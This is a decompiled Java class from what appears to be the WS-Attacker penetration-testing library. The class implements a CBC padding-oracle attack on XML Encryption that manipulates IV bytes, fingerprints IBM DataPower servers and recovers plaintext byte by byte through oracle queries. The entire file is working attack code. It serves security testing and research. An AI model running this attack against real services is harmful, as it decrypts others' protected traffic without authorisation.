/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc;

import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.Set;
import org.apache.log4j.Logger;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindByteMethod;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindIVMethodProperties;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.Method;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.NoColumnFoundException;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.NoPaddingMaskFoundException;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.CBCOracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;

public class FindIVMethodSimple
extends Method {
    Logger LOG = Logger.getLogger(FindIVMethodSimple.class);
    private final int blockSize;
    private final boolean processingLastBlock;
    private final FindIVMethodProperties properties;
    private final Set<Integer> paddingByteMasksFirst4Bits;
    private byte lastIvByteOriginal;
    private byte firstIvValidByte;
    private int largestPaddingByte;

    public FindIVMethodSimple(AOracle oracle, byte[] iv, byte[] c1, boolean processingLastBlock) {
        super(oracle, iv, c1);
        this.blockSize = iv.length;
        this.processingLastBlock = processingLastBlock;
        this.properties = new FindIVMethodProperties(this.blockSize);
        this.paddingByteMasksFirst4Bits = new LinkedHashSet<Integer>();
    }

    public FindIVMethodSimple(AOracle oracle, byte[] iv, byte[] c1, boolean processingLastBlock, FindIVMethodProperties.Type type) {
        this(oracle, iv, c1, processingLastBlock);
        this.properties.setType(type);
    }

    @Override
    public byte[] executeAttack() {
        this.LOG.info((Object)"FindIV simple method started");
        this.lastIvByteOriginal = this.iv[this.blockSize - 1];
        this.findPaddingMasks();
        this.identifyOracleType();
        this.decryptLastByte();
        int searchedBytes = this.processingLastBlock ? this.blockSize - this.properties.getByte(this.blockSize - 1) : this.blockSize - 1;
        this.LOG.info((Object)"Starting to attack specific bytes with the FindByte method");
        byte[] tempIV = (byte[])this.iv.clone();
        for (int i = 0; i < searchedBytes; ++i) {
            int mask = this.getMaskForPadding(this.blockSize - i - 1);
            tempIV[this.blockSize - 1] = (byte)(this.lastIvByteOriginal ^ mask);
            CBCOracleRequest req = new CBCOracleRequest(tempIV, this.c1);
            OracleResponse resp = this.m_Oracle.queryOracle(req);
            if (resp.getResult() != OracleResponse.Result.VALID) {
                this.LOG.info((Object)("Byte " + i + " was originally '<'."));
                tempIV[i] = (byte)(tempIV[i] ^ 1);
                this.properties.setByte(i, (byte)60);
            }
            if (this.properties.isByteDecrypted(i)) continue;
            try {
                FindByteMethod findByteMethod = new FindByteMethod(this.m_Oracle, tempIV, this.c1);
                this.LOG.info((Object)("Attack on byte: " + i));
                byte b = findByteMethod.executeAttack(i);
                this.properties.setByte(i, b);
                this.LOG.info((Object)("Result " + (char)b + " (0x" + String.format("%02X", b) + ")"));
                continue;
            }
            catch (NoColumnFoundException ncfe) {
                this.LOG.warn((Object)("Byte " + i + " could not be decrypted. Is the file using" + "a different character set or includes strange special" + " characters?"));
                this.LOG.debug((Object)"debug ", (Throwable)ncfe);
            }
        }
        byte[] decrypted = this.processingLastBlock ? Arrays.copyOf(this.properties.getDecryptedBytes(), searchedBytes) : Arrays.copyOf(this.properties.getDecryptedBytes(), this.blockSize);
        return decrypted;
    }

    private void identifyOracleType() {
        if (this.properties.getType() == FindIVMethodProperties.Type.UNDEFINED) {
            if (this.paddingByteMasksFirst4Bits.size() == 1) {
                this.LOG.info((Object)"The server has been identified to be processing as IBM Datapower");
                this.properties.setType(FindIVMethodProperties.Type.IBM_DATAPOWER);
            } else {
                this.LOG.info((Object)"The server has been identified to be processing as a default one");
                this.properties.setType(FindIVMethodProperties.Type.DEFAULT);
            }
        }
        this.largestPaddingByte = this.properties.getType() == FindIVMethodProperties.Type.IBM_DATAPOWER ? 15 : 16;
    }

    private void findPaddingMasks() {
        for (int firstIVMask = 0; firstIVMask < 2; ++firstIVMask) {
            byte[] tempIV = (byte[])this.iv.clone();
            tempIV[0] = (byte)(this.iv[0] ^ firstIVMask);
            for (int b = 0; b < 256; ++b) {
                tempIV[this.blockSize - 1] = (byte)(b ^ this.lastIvByteOriginal);
                CBCOracleRequest req = new CBCOracleRequest(tempIV, this.c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() != OracleResponse.Result.VALID) continue;
                int pm = (b & 0xF0) >> 4;
                this.paddingByteMasksFirst4Bits.add(pm);
                this.firstIvValidByte = tempIV[0];
                if (this.properties.getType() == FindIVMethodProperties.Type.DEFAULT) {
                    this.paddingByteMasksFirst4Bits.add(pm ^ 1);
                    this.LOG.info((Object)("padding bytes masks found (default oracle): " + this.paddingByteMasksFirst4Bits.toString()));
                    return;
                }
                if (this.properties.getType() != FindIVMethodProperties.Type.IBM_DATAPOWER) continue;
                this.LOG.info((Object)("padding bytes masks found (datapower oracle): " + this.paddingByteMasksFirst4Bits.toString()));
                return;
            }
        }
    }

    private void decryptLastByte() {
        int largestPaddingMask = this.findMaskForLargestPadding();
        int decryptedByte = largestPaddingMask ^ this.largestPaddingByte;
        this.LOG.info((Object)("Found the last byte in our block: 0x" + String.format("%02X ", decryptedByte)));
        this.properties.setByte(this.blockSize - 1, (byte)decryptedByte);
    }

    private int findMaskForLargestPadding() {
        byte originalIteratedByte;
        int iteratingOverIvByte;
        byte[] tempIV = (byte[])this.iv.clone();
        tempIV[0] = this.firstIvValidByte;
        if (this.properties.getType() == FindIVMethodProperties.Type.IBM_DATAPOWER) {
            iteratingOverIvByte = 1;
            originalIteratedByte = tempIV[1];
        } else {
            iteratingOverIvByte = 0;
            originalIteratedByte = tempIV[0];
        }
        for (int pbm : this.paddingByteMasksFirst4Bits) {
            block1: for (int i = 0; i < 16; ++i) {
                int pm = (pbm << 4) + i;
                tempIV[this.blockSize - 1] = (byte)(this.lastIvByteOriginal ^ pm);
                for (int firstIVMask = 0; firstIVMask < 16; ++firstIVMask) {
                    tempIV[iteratingOverIvByte] = (byte)(originalIteratedByte ^ firstIVMask << 4);
                    CBCOracleRequest req = new CBCOracleRequest(tempIV, this.c1);
                    OracleResponse resp = this.m_Oracle.queryOracle(req);
                    if (resp.getResult() != OracleResponse.Result.VALID) continue block1;
                }
                return pm;
            }
        }
        throw new NoPaddingMaskFoundException();
    }

    private int getMaskForPadding(int padding) {
        return padding ^ this.properties.getByte(this.blockSize - 1);
    }

    public FindIVMethodProperties getProperties() {
        return this.properties;
    }
}

